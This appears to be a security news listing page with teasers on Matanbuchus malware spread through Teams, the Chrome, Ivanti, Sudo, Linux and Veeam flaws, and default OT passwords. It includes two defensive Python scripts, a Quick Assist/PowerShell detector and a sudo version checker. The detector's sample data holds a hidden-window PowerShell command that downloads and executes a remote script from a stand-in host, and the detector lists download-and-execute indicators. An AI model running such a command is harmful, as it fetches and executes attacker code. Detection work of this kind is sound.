Teams Drops Sneaky Matanbuchus Malware

Fake “IT Help Desk” Teams Calls Drop Sneaky Matanbuchus 3.0 Malware Researchers have spotted Matanbuchus 3.0, an upgraded malware‑as‑a‑service loader, being pushed through Microsoft Teams calls that pose as helpful IT staff. Targets are tricked into launching Quick Assist, granting attackers remote access so they can run a PowerShell script that drops the loader. Matanbuchus 3.0 boasts […]
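The chain described above (Quick Assist launched by the victim, then PowerShell run by the attacker in that session) leaves a simple pattern in process-creation telemetry. The following is an added example, not code from the article or from any vendor: it correlates a Quick Assist start with a PowerShell launch on the same host inside a time window and tags command-line traits. The Sysmon-style event layout, the image name QuickAssist.exe and the sample events are all constructed assumptions.

```python
"""Added example (not from the article): flag PowerShell started on a host
shortly after Quick Assist, the remote-access path described in the story.
Event records, the image name QuickAssist.exe and the indicator list are
assumptions made for this example."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: datetime      # event time
    host: str         # endpoint name
    image: str        # process image name
    parent: str       # parent image name
    cmdline: str      # full command line


# Constructed telemetry: WS-0412 matches the described chain, the others do not.
SAMPLE_EVENTS = [
    ProcEvent(datetime(2025, 7, 15, 9, 2, 0), "WS-0412", "ms-teams.exe", "explorer.exe", "ms-teams.exe"),
    ProcEvent(datetime(2025, 7, 15, 9, 4, 10), "WS-0412", "QuickAssist.exe", "explorer.exe", "QuickAssist.exe"),
    ProcEvent(datetime(2025, 7, 15, 9, 7, 30), "WS-0412", "powershell.exe", "explorer.exe",
              'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/x.ps1 | iex"'),
    ProcEvent(datetime(2025, 7, 15, 10, 0, 0), "WS-0099", "powershell.exe", "explorer.exe",
              "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcEvent(datetime(2025, 7, 15, 14, 0, 0), "WS-0207", "QuickAssist.exe", "explorer.exe", "QuickAssist.exe"),
]

WINDOW = timedelta(minutes=30)  # assumed: how long after Quick Assist starts we correlate

# Command-line traits worth surfacing on a PowerShell launch (heuristics, not from the article).
SUSPICIOUS_FLAGS = (
    "-ep bypass", "-executionpolicy bypass", "-enc", "-encodedcommand", "-w hidden",
    "iwr ", "invoke-webrequest", "downloadstring", "iex", "invoke-expression",
)


def score_cmdline(cmdline: str) -> list:
    """Return the suspicious substrings present in a command line (case-insensitive)."""
    low = cmdline.lower()
    return [f for f in SUSPICIOUS_FLAGS if f in low]


def find_quickassist_powershell(events, window=WINDOW) -> list:
    """Return one alert per PowerShell start that follows a Quick Assist start
    on the same host within `window`. Parent image is deliberately ignored:
    in a Quick Assist session the attacker drives the victim's own desktop,
    so PowerShell is normally spawned by explorer.exe, not by QuickAssist.exe."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(ev.host, []).append(ev)

    alerts = []
    for host, evs in by_host.items():
        qa_starts = [e.ts for e in evs if e.image.lower() == "quickassist.exe"]
        for e in evs:
            if e.image.lower() not in ("powershell.exe", "pwsh.exe"):
                continue
            recent = [t for t in qa_starts if t <= e.ts <= t + window]
            if recent:
                alerts.append({
                    "host": host,
                    "quickassist_at": max(recent),
                    "powershell_at": e.ts,
                    "cmdline": e.cmdline,
                    "indicators": score_cmdline(e.cmdline),
                })
    return alerts


if __name__ == "__main__":
    for a in find_quickassist_powershell(SAMPLE_EVENTS):
        print(a["host"], a["powershell_at"], a["indicators"])
        print("  ", a["cmdline"])
```

The correlation alone will fire on legitimate help-desk sessions, so the `indicators` list is what an analyst should read first; a PowerShell launch with no download or execution-policy flags during a scheduled support call is a very different finding from the hidden-window `iwr | iex` pattern in the constructed sample.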

Read More

Google fix for active Chrome zero-day

Google rushes out fix for active Chrome zero-day CVE-2025-6554 – a critical vulnerability in Chrome’s V8 engine – is being exploited right now, so Google has released an out-of-band patch. What happened? • A type-confusion bug lets an attacker craft a web page that reads or writes arbitrary memory, paving the way for full code […]

Read More

Hidden threats in normal traffic

Why “Innocent” Network Traffic May Be Your Biggest Cyber Risk Threat actors increasingly disguise malicious activity as normal network traffic: 80% of attacks in CrowdStrike’s 2025 report were “malware-free,” relying on credential theft, DLL hijacking and other living-off-the-land tactics. Traditional edge devices and EDR miss much of this traffic—Verizon notes breaches via VPNs and […]

Read More

zero-day spree hits Ivanti gateways

Chinese hackers weaponise new Ivanti CSA bugs to hit French public and private sector Chinese threat group “Houken” (overlapping Google Mandiant’s UNC5174) exploited three zero-day flaws in Ivanti Cloud Services Appliance (CSA) – CVE-2024-8963, CVE-2024-9380 and CVE-2024-8190 – to breach French government, telecoms, media, finance and transport bodies in September 2024. According to France’s cyber-security […]

Read More

hidden weaknesses in AI SOC tools

The hidden weaknesses in AI SOC tools AI-driven Security Operations Centre (SOC) platforms promise faster triage and fewer false alarms, yet most depend on pre-trained models that only recognise a narrow set of threats. These fixed models can’t keep up with today’s constantly shifting alert landscape, forcing analysts back to manual work whenever an unfamiliar […]

Read More

Sudo privilege-escalation double punch

Critical Sudo Bugs Hand Attackers Root Access – Patch Now Security researchers have uncovered two flaws in the ubiquitous Sudo utility that let any local user on vulnerable Linux and Unix-like systems gain root. • CVE-2025-32462 (CVSS 2.8) – a 12-year-old bug in the -h host option lets commands permitted for a different host run […]
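The first question on any fleet is simply which hosts still run a sudo build in the affected range. The following is an added example, not code from the article or from the sudo project: it parses the first line of `sudo --version` output and compares it against the range for the -h host bug. The range 1.8.8 through 1.9.17 inclusive and the fixed release 1.9.17p1 are taken from the upstream sudo advisory, not from this page, and should be treated as assumptions to verify against your distribution's advisory.

```python
"""Added example (not from the article): classify a host from `sudo --version`
output. Affected range (1.8.8 .. 1.9.17) and fixed release (1.9.17p1) are
assumptions taken from the upstream sudo advisory for the -h host bug."""
import re
import subprocess

FIRST_AFFECTED = (1, 8, 8, 0)   # assumed: -h option first appeared in 1.8.8
FIXED = (1, 9, 17, 1)           # assumed: 1.9.17p1 carries the fix

# Matches the first line of `sudo --version`, e.g. "Sudo version 1.9.16p2".
_VER_RE = re.compile(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", re.M)


def parse_sudo_version(text: str):
    """'Sudo version 1.9.16p2 ...' -> (1, 9, 16, 2); None if no version line."""
    m = _VER_RE.search(text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_affected(version) -> bool:
    """True when the tuple lies inside the assumed affected range."""
    return FIRST_AFFECTED <= version < FIXED


def format_version(v) -> str:
    return "%d.%d.%d%s" % (v[0], v[1], v[2], "p%d" % v[3] if v[3] else "")


def check_sudo_output(text: str) -> str:
    """Turn raw `sudo --version` output into a one-line verdict."""
    v = parse_sudo_version(text)
    if v is None:
        return "unknown: no 'Sudo version' line found"
    if is_affected(v):
        return "affected: sudo %s is in the vulnerable range, upgrade to 1.9.17p1 or later" % format_version(v)
    return "not affected: sudo %s" % format_version(v)


def check_local_sudo() -> str:
    """Run the check on this host (requires sudo on PATH)."""
    out = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False).stdout
    return check_sudo_output(out)


if __name__ == "__main__":
    print(check_local_sudo())
```

One caveat a version check cannot cover: enterprise distributions often backport the fix without changing the upstream version string, so a host reporting 1.9.16p2 may already be patched. Confirm against the package changelog (`rpm -q --changelog sudo`, `apt changelog sudo`) before raising a ticket on that host.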

Read More

Stop using factory passwords

Iranian attackers recently manipulated a small U.S. water-treatment station simply by logging in with the factory-set password “1111”. The incident led CISA to repeat years-old advice: default credentials remain one of the most abused weaknesses in operational-technology (OT) and IoT environments. Default passwords survive because they simplify initial set-up and bulk provisioning, yet they invite […]

Read More

Critical Veeam Backup Vulnerability

Veeam rushes out fix for critical backup flaw Veeam has issued updates for Backup & Replication after researchers from CODE WHITE and watchTowr disclosed CVE-2025-23121, a remote-code-execution bug scored 9.9/10.0 on the CVSS scale. The flaw affects every Version 12 build up to 12.3.1.1139 and lets an authenticated Windows domain user run arbitrary code on […]

Read More

Linux flaws let local users grab root

New Linux Bugs Give Attackers Instant Root – Patch Now Security firm Qualys has revealed two local-privilege-escalation bugs that, when chained, let any logged-in user on most Linux distributions become root in seconds. • CVE-2025-6018 sits in the PAM configuration shipped with openSUSE Leap 15 and SUSE Linux Enterprise 15, allowing a normal user to […]

Read More